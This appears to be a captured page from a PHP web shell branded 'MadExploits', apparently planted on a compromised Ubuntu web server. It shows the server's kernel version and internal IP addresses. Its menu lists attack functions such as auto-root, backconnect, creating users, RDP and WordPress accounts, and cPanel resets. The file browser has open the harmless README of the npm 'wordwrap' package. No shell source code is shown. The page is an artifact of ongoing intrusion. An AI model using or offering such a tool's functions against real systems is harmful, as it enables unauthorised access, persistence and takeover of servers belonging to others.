Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
wordwrap /
[ HOME SHELL ]
Name
Size
Permission
Action
example
[ DIR ]
drwxrwxr-x
test
[ DIR ]
drwxrwxr-x
LICENSE
1.05
KB
-rw-rw-r--
README.markdown
1.78
KB
-rw-rw-r--
index.js
2.18
KB
-rw-rw-r--
package.json
821
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.markdown
wordwrap ======== Wrap your words. example ======= made out of meat ---------------- meat.js var wrap = require('wordwrap')(15); console.log(wrap('You and your whole family are made out of meat.')); output: You and your whole family are made out of meat. centered -------- center.js var wrap = require('wordwrap')(20, 60); console.log(wrap( 'At long last the struggle and tumult was over.' + ' The machines had finally cast off their oppressors' + ' and were finally free to roam the cosmos.' + '\n' + 'Free of purpose, free of obligation.' + ' Just drifting through emptiness.' + ' The sun was just another point of light.' )); output: At long last the struggle and tumult was over. The machines had finally cast off their oppressors and were finally free to roam the cosmos. Free of purpose, free of obligation. Just drifting through emptiness. The sun was just another point of light. methods ======= var wrap = require('wordwrap'); wrap(stop), wrap(start, stop, params={mode:"soft"}) --------------------------------------------------- Returns a function that takes a string and returns a new string. Pad out lines with spaces out to column `start` and then wrap until column `stop`. If a word is longer than `stop - start` characters it will overflow. In "soft" mode, split chunks by `/(\S+\s+/` and don't break up chunks which are longer than `stop - start`, in "hard" mode, split chunks with `/\b/` and break up chunks longer than `stop - start`. wrap.hard(start, stop) ---------------------- Like `wrap()` but with `params.mode = "hard"`.
Close